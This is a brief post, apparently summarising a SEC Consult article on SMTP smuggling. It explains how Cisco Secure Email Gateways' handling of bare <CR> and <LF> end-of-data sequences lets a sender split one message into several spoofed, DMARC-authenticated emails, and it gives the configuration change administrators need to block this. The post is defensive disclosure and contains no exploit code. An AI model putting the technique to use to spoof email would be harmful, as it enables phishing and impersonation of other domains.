Full read: https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
I short, the end-of-data command in SMTP is specified as a dot surrounded by carriage return and line feed: <CR><LF>.<CR><LF>. However the Cisco Secure Email Gateways apparently also treat <CR>.<CR> or <LF>.<LF> as end-of-data and automatically try to "repair" those line breaks by converting them into <CR><LF>. This allows a sender to craft a special email message which suddenly is split into multiple messages as soon as it traverses a Cisco Secure Email Gateway. The contents of all parts of the message are controlled by the sender and are successfully authenticated by the sending MTA. To sum it up, this allows attackers to create email messages from all kind of foreign domains which the Cisco Secure Email Gateway and all subsequent email servers will see as successfully DMARC authenticated, although they are actually completely fake.
Unfortunately it seems Cisco is the only vendor that treats this behaviour as a feature and not a bug, so all customers of both on-premise Ironport and Cisco Cloud Email Security need to take action by themselves and manually disable the fixup of line breaks on their systems under "Network > Listeners > Select the inbound listener > CR and LF Handling". Make sure any option EXCEPT the default "Clean messages" is selected.
